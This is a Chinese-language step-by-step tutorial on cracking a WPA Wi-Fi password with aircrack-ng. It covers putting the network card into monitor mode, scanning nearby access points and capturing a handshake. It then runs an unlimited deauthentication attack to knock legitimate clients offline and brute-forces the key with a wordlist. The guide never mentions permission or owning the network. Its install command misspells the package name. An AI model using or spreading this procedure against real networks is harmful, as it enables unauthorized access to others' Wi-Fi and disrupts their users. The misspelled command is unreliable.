使用工具:aircrak-ng
环境:deepin linux
虚拟机读取不了笔记本的网卡信息,推荐使用物理机进行操作,或者购买wifi接收器
若无此工具要先安装
apt-get install aircrak-ng
首先开启网卡监听模式
sudo airmon-ng start wlp2s0
wlp2s0为本机网卡名,可用ifconfig或iwconfig查看
此时卡网被改了名字,上图可见,或则同样ifconfig或iwconfig查看
然后扫描附近wifi信号
sudo airodump-ng wlp2s0mon
注:airodump-ng <你的网卡名称>
• BSSID是AP端的MAC地址
• PWR是信号强度,数字越小越好
• Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。
• CH是对应路由器的所在频道
• ESSID是对应路由器的名称
停止扫描后使用airodump-ng监听指定目标频道
注:airodump-ng -c <AP的频道> -w <抓取握手包的存放位置> --bssid <AP的MAC地址> <你的网卡名称>
当你获取道握手包时,右上角区域会显示”WPA handshake”,因为后期截图的原因,这里显示已获取,若没有获取则需要发动攻击,迫使合法的客户端断线,进行重新认证,我们趁机抓包。保持上一个终端窗口的运行状态,打开一个新的终端
注:aireplay-ng -<攻击模式,我们这里使用 解除认证攻击> [攻击次数,0为无限攻击] -a <AP端的MAC地址> -c <客户端端的MAC地址> <你的网卡名称>
这里我使用的是解除认证攻击模式,给客户端无限发送测试包使其下线。当你获取到握手包时,可以使用Ctrl + C 停止发送测试包。
在你的抓取握手包的存放目录会生成4个文件,握手包文件的拓展名为 .cap
现在可关闭监听模式,不关也无影响
sudo airmon-ng stop wlp2s0mon
并且重启网卡服务
systemctl start NetworkManager.service
最后使用字典进行暴力**
当密码**成功时,会显示”KEY FOUND!”字样,中括号为wifi密码。
注:aircrack-ng -w <字典路径> <握手包路径>